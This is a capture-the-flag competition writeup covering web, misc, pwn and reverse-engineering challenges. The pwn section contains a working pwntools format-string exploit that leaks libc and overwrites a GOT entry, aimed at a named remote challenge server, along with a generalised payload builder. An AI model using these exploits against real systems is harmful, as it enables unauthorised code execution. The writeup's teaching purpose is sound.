
[Zhejiang Provincial Cybersecurity Competition, online round] writeup

Zhejiang Provincial Cybersecurity Competition

ch1pppppppp
First! hehe

web

石庆数码

Open the page and click GO BACK.
Open the developer tools (F12); the flag is right there in the page source.

眼疾手快

Open the page and read the JavaScript behind the cookie:


var clicks = 0;                        // global counter: anything typed in the console can change it
$(function() {
    $("#cookie")
        .mousedown(function() {
            $(this).width('350px').height('350px');
        })
        .mouseup(function() {
            $(this).width('375px').height('375px');
            clicks++;
            $("#clickcount").text(clicks);
            if (clicks >= 1000000) {   // the only check before the count is posted to the server
                var form = $('<form action="" method="post">' +
                    '<input type="text" name="clicks" value="' + clicks + '" hidden/>' +
                    '</form>');
                $('body').append(form);
                form.submit();         // POSTs clicks=<count> back to the same URL
            }
        });
});

The threshold is checked only on the client and the counter is a global, so in the console set it to just below the limit (`clicks = 999999`), then click the cookie once: the mouseup handler bumps it to 1000000 and submits the form with that value.
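Since the server only ever sees the posted `clicks` field, the click loop can be skipped entirely. The following is an added example (not the writeup's code) that builds the same `application/x-www-form-urlencoded` POST the page's JavaScript form would send and submits it from Python; the target URL is a placeholder because the writeup does not record it.

```python
import urllib.parse
import urllib.request

THRESHOLD = 1000000                            # the value the page's JS checks against
TARGET = "http://challenge.invalid/clicker"    # placeholder: the writeup does not give the URL


def build_click_request(url, clicks=THRESHOLD):
    """Build the request the JS form would send: POST clicks=<n> to the page itself.

    The form has action="" so a browser would post to the current page; here the
    page URL is passed in explicitly.
    """
    body = urllib.parse.urlencode({"clicks": clicks}).encode()
    return urllib.request.Request(
        url,
        data=body,
        method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )


def submit_clicks(url, clicks=THRESHOLD, opener=urllib.request.urlopen):
    """Send the forged submission and return the response body (the page with the flag).

    `opener` is injectable so the request can be inspected or replayed offline.
    """
    with opener(build_click_request(url, clicks), timeout=10) as resp:
        return resp.read()


if __name__ == "__main__":
    print(submit_clicks(TARGET).decode(errors="replace"))
```

Any server-side counter that trusts a client-reported total is bypassed this way; the fix is to count clicks on the server (for example, one request per click against a session) rather than accept the total from the browser.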

你追我赶

56F7D064830B4B154C94DEF7AFAA56B1
AD27619CFCF74D7B3E5615870D2E5271

CAE1304F59AD5B5E41ADC04E21BC75A1
3AD92C62A81E4A25752F4C05387A85E2

misc

躲躲藏藏

Download the image and run binwalk on it: there is a zip embedded inside.
`binwalk -e` extracts it, and out comes an xls file.
Change the file type from xls to doc (rename the extension; legacy .xls and .doc are both OLE2 compound documents with the same magic bytes, so Word opens it as-is).
Inside you find
zjctf{GFDGFA_GGDFFXXFFA_GGADXG_DFDGDGFAFA_GGDFFXXF}
The ciphertext uses only the letters A, D, F, G and X; decode it with the cipher disk and you are done.
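What binwalk does here is find a zip local-file-header signature inside the image and hand the tail of the file to a zip parser, and the xls/doc confusion is resolved by looking at magic bytes instead of the extension. The following is an added example, not part of the writeup, that carves an embedded zip out of any file, extracts its members and identifies what came out by its leading bytes; the "image" it runs on is constructed inline (a fake PNG header with a zip appended).

```python
import io
import zipfile

ZIP_LOCAL_HEADER = b"PK\x03\x04"
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # shared by legacy .doc, .xls and .ppt

MAGICS = [
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
    (OLE2_MAGIC, "ole2 (doc/xls/ppt: the extension does not tell them apart)"),
    (ZIP_LOCAL_HEADER, "zip (also docx/xlsx/jar/apk)"),
]


def sniff(data):
    """Describe a file type from its leading bytes, or return 'unknown'."""
    for magic, name in MAGICS:
        if data.startswith(magic):
            return name
    return "unknown"


def find_embedded_zips(data):
    """Offsets of every zip local-file-header signature in `data` (what binwalk reports)."""
    offsets, pos = [], data.find(ZIP_LOCAL_HEADER)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(ZIP_LOCAL_HEADER, pos + 1)
    return offsets


def carve_zip(data, offset):
    """Open the archive that starts at `offset` (like `binwalk -e`) and return {name: bytes}.

    zipfile locates the end-of-central-directory record by scanning back from the end of
    the buffer, so handing it data[offset:] works for an archive appended to an image.
    """
    with zipfile.ZipFile(io.BytesIO(data[offset:])) as zf:
        return {info.filename: zf.read(info) for info in zf.infolist()}


def build_sample_image():
    """Constructed test input: a fake PNG header and filler, then a zip appended to the
    end the way the challenge hid its archive. The member is an OLE2 blob named as a
    spreadsheet, mirroring the xls-that-was-a-doc in the challenge."""
    png_prefix = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64
    hidden_doc = OLE2_MAGIC + b"\x00" * 24 + b"sample flag text"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("flag.xls", hidden_doc)
    return png_prefix + buf.getvalue()


if __name__ == "__main__":
    img = build_sample_image()
    print("container:", sniff(img))
    for off in find_embedded_zips(img):
        for name, blob in carve_zip(img, off).items():
            print("%s at offset %d -> %s" % (name, off, sniff(blob)))
```

Scanning for `PK\x03\x04` alone gives false positives on random data, which is why binwalk also validates the header fields; for a CTF image a failed `ZipFile` open on a candidate offset is a good enough filter.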

pwn

一夫当关

A simple format string vulnerability; the exploit is given directly below. Two caveats on the write: `b - a` is only a valid width because the libc base is page-aligned, so the low half (`b`) is always larger than the byte above it (`a`); and `%Nx` pads to at least N characters, so if N were smaller than the hex digits of the argument it consumes, the count would overshoot (`%Nc` prints exactly N characters and avoids that).

#coding=utf8
# Exploit for 一夫当关: the binary calls printf() on user input. Two round trips:
# 1) leak a libc pointer off the stack with %lx, 2) overwrite a GOT slot with a one-gadget.
# Ported to Python 3 pwntools (bytes payloads); the logic is unchanged.
from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal', '-x', 'bash', '-c']

local = 0

if local:
    cn = process('./59XeYrdIHL')
else:
    cn = remote('sec4.hdu.edu.cn', 9999)
bin = ELF('./59XeYrdIHL')

def z(a=''):
    gdb.attach(cn, a)
    if a == '':
        input()

# Round 1: with no arguments, %lx prints the next vararg register (rsi on x86-64),
# which holds a libc address; 0x3C4963 is its offset from the libc base on the remote glibc.
buf = b'0x%08lx'
cn.sendline(buf)
lbase = int(cn.recvline().strip(), 16) - 0x3C4963
print('lbase: ' + hex(lbase))

# Round 2: write the low three bytes of the one-gadget (libc+0x45216) over the GOT slot
# at 0x601018. The format text occupies 32 bytes = 4 stack slots, so the two pointers
# appended after it are reachable as positional arguments 12 and 13.
a = ((lbase + 0x45216) & 0xff0000) >> 16   # byte 2 -> stored with %hhn through $12
b = (lbase + 0x45216) & 0xffff             # bytes 0-1 -> stored with %hn through $13
buf = '%' + str(a) + 'x' + '%12$hhn'       # print a chars, store a at 0x60101a
buf += '%' + str(b - a) + 'x' + '%13$hn'   # total printed is now b, store b at 0x601018
buf = buf.encode().ljust(32, b'a')         # pad so the pointers start at slot 12
buf += p64(0x601018 + 2)
buf += p64(0x601018)                       # the NUL bytes end the string for printf but stay on the stack
cn.sendline(buf)

cn.interactive()
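The two arithmetic lines in the exploit are one instance of the general `%hhn`/`%hn` write: for each write, the padding width is (wanted value minus characters already printed) reduced modulo the write size, which also handles the case where a later value is smaller than an earlier one. The following is an added example, not the writeup's exploit: a builder that generalises that computation, a minimal emulator of printf's character counter so the payload can be checked offline, and a `read_mem` helper for the result. The one-gadget and GOT offsets are the ones the exploit uses; the positional index of the format buffer (8) is derived from the exploit's `$12`/`$13` with 32 bytes of padding; the libc base in the usage is a made-up value.

```python
import re
import struct

ONE_GADGET_OFF = 0x45216   # libc offset used by the exploit above
GOT_SLOT = 0x601018        # GOT entry the exploit overwrites
FMT_ARG = 8                # positional index of the first 8 bytes of our buffer ($12 - 32/8)
PAD = 32                   # bytes of format text before the two pointer slots


def build_payload(target, got=GOT_SLOT, fmt_arg=FMT_ARG, pad=PAD):
    """printf payload writing the low 3 bytes of `target` over `got`:
    byte 2 via %hhn, bytes 0-1 via %hn.

    Each width is the distance from the running character count to the wanted value,
    reduced modulo the write size, so the second write works even when its value is
    below the first one. %Nc is used because it prints exactly N characters.
    """
    hi, lo = (target >> 16) & 0xff, target & 0xffff
    idx_hi = fmt_arg + pad // 8          # positional arg holding &got+2
    idx_lo = idx_hi + 1                  # positional arg holding &got
    fmt, printed = "", 0
    for modulus, value, idx, conv in ((0x100, hi, idx_hi, "hhn"), (0x10000, lo, idx_lo, "hn")):
        delta = (value - printed) % modulus
        if delta:
            fmt += "%%%dc" % delta
            printed += delta
        fmt += "%%%d$%s" % (idx, conv)
    fmt = fmt.encode()
    if len(fmt) > pad:
        raise ValueError("format text would spill into the pointer slots")
    # The pointers contain NUL bytes: printf stops reading there, but they stay on the stack.
    return fmt.ljust(pad, b"a") + struct.pack("<QQ", got + 2, got)


DIRECTIVE = re.compile(r"%(?P<width>\d*)c|%(?P<arg>\d+)\$(?P<conv>hhn|hn|n)")
SIZES = {"hhn": 1, "hn": 2, "n": 4}


def emulate_printf(payload, fmt_arg=FMT_ARG):
    """Replay glibc's character counter over `payload`; return {address: byte} for every
    %n-style write. Only %Nc and positional %k$hhn/%k$hn/%k$n are modelled, which is
    all build_payload emits."""
    text = payload.split(b"\x00", 1)[0].decode("latin-1")   # printf stops at the first NUL
    mem, printed, pos = {}, 0, 0
    for m in DIRECTIVE.finditer(text):
        printed += m.start() - pos       # literal characters between directives count too
        pos = m.end()
        if m.group("conv") is None:
            printed += int(m.group("width") or "1")
            continue
        slot = (int(m.group("arg")) - fmt_arg) * 8   # byte offset of that argument in our buffer
        addr = struct.unpack_from("<Q", payload, slot)[0]
        for i in range(SIZES[m.group("conv")]):
            mem[addr + i] = (printed >> (8 * i)) & 0xff
    return mem


def read_mem(mem, addr, size):
    """Little-endian integer assembled from `size` bytes of emulated memory (0 where unwritten)."""
    return sum(mem.get(addr + i, 0) << (8 * i) for i in range(size))


if __name__ == "__main__":
    lbase = 0x7ffff7a0d000                  # made-up libc base for the demonstration
    payload = build_payload(lbase + ONE_GADGET_OFF)
    print(payload)
    print(hex(read_mem(emulate_printf(payload), GOT_SLOT, 3)))
```

Mixing unnumbered `%Nc` with positional `%k$n` in one format string is undefined by the C standard but glibc handles it, and the writeup's exploit relies on the same behaviour. The emulator is only as faithful as the assumption that `%Nc` prints exactly N characters, which is why `%Nc` rather than `%Nx` is the safer choice for the padding.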

re

逆向逆向

Analysing the program logic in IDA, it is easy to see that it is base32 encoding with the trailing '=' removed to disguise it. Append the four stripped '=' characters to the result string and drop it into an online decoder to get the flag.
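Stripping the '=' is cosmetic: base32 output length is fixed by the input length, so the padding can be recomputed, and a length that no base32 encoder can produce rules the encoding out. The following is an added example, not from the writeup, that restores the padding for any stripped base32 string, rejects impossible lengths, and recognises the encoding by its alphabet (the same 32-character table you see in the binary in IDA). The sample strings are the RFC 4648 test vectors with their padding removed.

```python
import base64
import string

B32_ALPHABET = frozenset(string.ascii_uppercase + "234567")   # the table a base32 routine embeds
# base32 emits 8 characters per 5 input bytes; a final partial group of 1..4 bytes gives
# 2, 4, 5 or 7 characters, so these are the only lengths (mod 8) a stripped string can have.
VALID_TAIL_LENGTHS = frozenset({0, 2, 4, 5, 7})


def looks_like_base32(s):
    """True if every character is in the RFC 4648 base32 alphabet (no padding present)."""
    return bool(s) and set(s) <= B32_ALPHABET


def is_possible_base32_length(n):
    """True if a base32 encoder can produce exactly n characters before padding."""
    return n % 8 in VALID_TAIL_LENGTHS


def restore_padding(s):
    """Append the '=' characters the encoder would have emitted for this length."""
    core = s.strip().rstrip("=")
    if not is_possible_base32_length(len(core)):
        raise ValueError("length %d is impossible for base32 output" % len(core))
    return core + "=" * (-len(core) % 8)


def b32decode_unpadded(s):
    """Decode base32 whose padding was stripped; plain b32decode raises 'Incorrect padding'."""
    core = s.strip().rstrip("=")
    if not looks_like_base32(core):
        raise ValueError("not base32 text")
    return base64.b32decode(restore_padding(core))


if __name__ == "__main__":
    for stripped in ("MZXQ", "MZXW6", "MZXW6YQ", "MZXW6YTBOI"):
        print(stripped, "->", restore_padding(stripped), "->", b32decode_unpadded(stripped))
```

The four '=' mentioned in the writeup mean the challenge string had a length of 4 mod 8, i.e. its final group encoded two bytes.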

加密应用

Unzip the apk, convert the dex file to a jar and open it in jd-gui; the check function below appears (cleaned up from the decompiler's goto-style output, same logic):

package com.example.ctf;

import java.util.Vector;

public class a
{
  int[] aa = { 57, 60, 80, 113, 64, 57, 74, 79, 75, 55, 59, 68, 78, 69, 55, 61, 57, 59, 62, 74, 68, 63, 60, 62, 69, 59, 72, 68, 74, 69, 67, 68, 55, 115, 63 };
  int[] bb = { 1190700, 733784, 659883, 1390032, 656600, 2723220, 632949, 608400, 930852, 1140624, 861258, 1105425, 699867, 1215808, 547658, 689472, 515450, 833508, 670453, 680823, 1072512, 699840, 614169, 719415, 894348, 632100, 942391, 1008600, 895279, 566150, 1065456, 751389, 836294, 1174212, 2937500 };

  public boolean a(String paramString)
  {
    // The input must be exactly as long as the constant tables (35 characters).
    if (paramString.length() != this.aa.length) {
      return false;
    }
    // Pass 1: only 'A'..'Z', '{' and '}' are accepted; the char codes are collected.
    Vector<Integer> localVector = new Vector<Integer>();
    for (int i = 0; i < paramString.length(); i++) {
      char c = paramString.charAt(i);
      if ((c < 'A' || c > 'Z') && c != '{' && c != '}') {
        return false;
      }
      localVector.add(Integer.valueOf(c));
    }
    // Pass 2: each character is checked independently: c^3 + aa[i] * c^2 == bb[i].
    for (int i = 0; i < localVector.size(); i++) {
      int c = localVector.get(i).intValue();
      if (Math.pow(c, 3.0D) + Math.pow(c, 2.0D) * this.aa[i] != this.bb[i]) {
        return false;
      }
    }
    return true;
  }
}

Each position is checked independently and c^3 + aa[i]*c^2 is strictly increasing for c > 0, so every position has at most one solution and can be brute-forced on its own. Script:

import string

# Constant tables lifted from the decompiled class (some values pasted as hex; same numbers).
aa = [57, 60, 80, 113, 64, 57, 74, 79, 75, 55, 59, 68, 78, 69, 55, 61, 57, 59, 62, 74, 68, 63, 60, 62, 69, 59, 72, 68, 74, 69, 67, 68, 55, 115, 63]
bb = [1190700, 733784, 659883, 1390032, 656600, 2723220, 632949, 608400, 930852, 1140624, 861258, 1105425, 699867, 1215808, 547658, 0xA8540, 515450, 833508, 670453, 680823, 0x105D80, 699840, 614169, 719415, 894348, 632100, 942391, 1008600, 895279, 566150, 0x1041F0, 751389, 836294, 1174212, 2937500]
flag = ''

# Per-position search: the check c^3 + aa[i]*c^2 == bb[i] involves only one character,
# and the left-hand side is strictly increasing in c, so the first hit is the only one.
for i in range(len(aa)):
    for j in string.printable:
        if pow(ord(j), 3) + pow(ord(j), 2) * aa[i] == bb[i]:
            flag += j
            break
    else:
        flag += '?'   # no printable character satisfies this position

print(flag)
